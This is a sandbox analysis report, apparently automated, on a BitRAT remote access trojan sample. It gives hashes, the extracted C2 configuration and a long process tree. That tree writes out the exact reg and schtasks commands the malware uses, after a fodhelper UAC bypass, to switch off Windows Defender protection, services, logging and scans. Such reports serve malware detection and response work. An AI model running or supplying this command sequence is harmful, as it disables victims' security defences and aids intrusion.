Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows10-1703_x64
  • resource
    win10-20220718-en
  • resource tags

    arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-08-2022 17:32

General

  • Target

    707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe

  • Size

    1.4MB

  • MD5

    44e041dc2e445fcd33cc89b8453d0539

  • SHA1

    99faf5ac243f30d7041e7018f41490023b552f60

  • SHA256

    707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad

  • SHA512

    893019fd4b969250464a551bdeb0fc050da5bc82f1680b5ef116e8cc43b2e0b4088ec351f91d0d4b379ffd61fb32a02a34ea11fb94ca35fc4ed064dda021bf18

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

trotox.duckdns.org:55441

Attributes
  • communication_password

    4b49ee1f55b1900518dfb23fd2d7c702

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 43 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe
    "C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3756
    • C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      2⤵
        PID:1868
        • C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe
          "C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe" -wdkill
          3⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3320
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
            4⤵
              PID:3740
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              4⤵
                PID:396
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                4⤵
                  PID:1028
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:496
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:60
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:2180
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        4⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:3360
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:4028
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                          4⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:3304
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                          4⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:3512
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:772
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                            4⤵
                              PID:3384
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                              4⤵
                                PID:4312
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                4⤵
                                  PID:4152
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                  4⤵
                                    PID:64
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                    4⤵
                                      PID:2644
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                      4⤵
                                        PID:400
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                        4⤵
                                          PID:4824
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                          4⤵
                                            PID:4656
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            4⤵
                                              PID:4480
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                              4⤵
                                                PID:4780
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                4⤵
                                                  PID:4700
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  4⤵
                                                    PID:3380
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                    4⤵
                                                      PID:3104
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                      4⤵
                                                        PID:2452
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                        4⤵
                                                          PID:2916
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                          4⤵
                                                            PID:4264
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                              PID:3368
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                              4⤵
                                                              • Modifies security service
                                                              PID:32
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                              4⤵
                                                                PID:2548
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                4⤵
                                                                  PID:4376
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                  4⤵
                                                                  • Modifies security service
                                                                  PID:5184
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                  4⤵
                                                                    PID:5176
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    4⤵
                                                                      PID:5168
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                      4⤵
                                                                        PID:5160
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                        4⤵
                                                                          PID:5152
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                          4⤵
                                                                            PID:5144
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                            4⤵
                                                                              PID:5136
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                              4⤵
                                                                                PID:5128
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                4⤵
                                                                                  PID:2972
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                  4⤵
                                                                                    PID:2072
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                    4⤵
                                                                                      PID:1648
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                      4⤵
                                                                                        PID:204
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                        4⤵
                                                                                          PID:396
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                          4⤵
                                                                                            PID:1872
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                            4⤵
                                                                                              PID:4292
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                              4⤵
                                                                                                PID:5036
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                4⤵
                                                                                                  PID:3204
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:3740
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                    4⤵
                                                                                                      PID:2828
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                      4⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:2024
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                      4⤵
                                                                                                        PID:2208
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                        4⤵
                                                                                                          PID:2244
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                          4⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:3384
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          4⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:96
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                          4⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:916
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                          4⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:496
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          4⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:3124
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                          4⤵
                                                                                                            PID:1992
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                            4⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:1520
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                            4⤵
                                                                                                              PID:4132
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                5⤵
                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                PID:2180
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                              4⤵
                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                              PID:3068
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                5⤵
                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                PID:4028
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                              4⤵
                                                                                                                PID:2000
                                                                                                          • C:\Windows\System32\fodhelper.exe
                                                                                                            "C:\Windows\System32\fodhelper.exe"
                                                                                                            2⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:920
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\707ce4ec41a0a919739998e1260e50eb8eca2808ee69df64b07a5e985d1068ad.exe" -wdkill
                                                                                                              3⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3340
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                                                                                                                4⤵
                                                                                                                  PID:3804
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                  4⤵
                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                  PID:1308
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                  4⤵
                                                                                                                    PID:2228
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                    4⤵
                                                                                                                      PID:2432
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
                                                                                                                      4⤵
                                                                                                                        PID:3720
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                        4⤵
                                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                                        PID:1616
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                        4⤵
                                                                                                                          PID:2024
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                          4⤵
                                                                                                                            PID:1520
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                            4⤵
                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                            PID:3780
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                            4⤵
                                                                                                                              PID:3648
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                              4⤵
                                                                                                                                PID:212
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                4⤵
                                                                                                                                  PID:560
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                  4⤵
                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                  PID:1120
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                  4⤵
                                                                                                                                    PID:3816
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                    4⤵
                                                                                                                                      PID:1468
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                      4⤵
                                                                                                                                        PID:3324
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                        4⤵
                                                                                                                                          PID:4216
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                          4⤵
                                                                                                                                            PID:4384
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                            4⤵
                                                                                                                                              PID:2684
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                              4⤵
                                                                                                                                                PID:2160
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                4⤵
                                                                                                                                                  PID:4564
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4740
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4904
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:2712
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:4764
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:4672
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5040
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4368
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4604
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                            4⤵
                                                                                                                                                            • Modifies security service
                                                                                                                                                            PID:4260
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4976
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                              4⤵
                                                                                                                                                              • Modifies security service
                                                                                                                                                              PID:5436
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5428
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5420
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5412
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5404
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5396
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5388
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:5380
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5372
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:5364
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5356
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5348
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5340
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5332
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5324
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5316
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
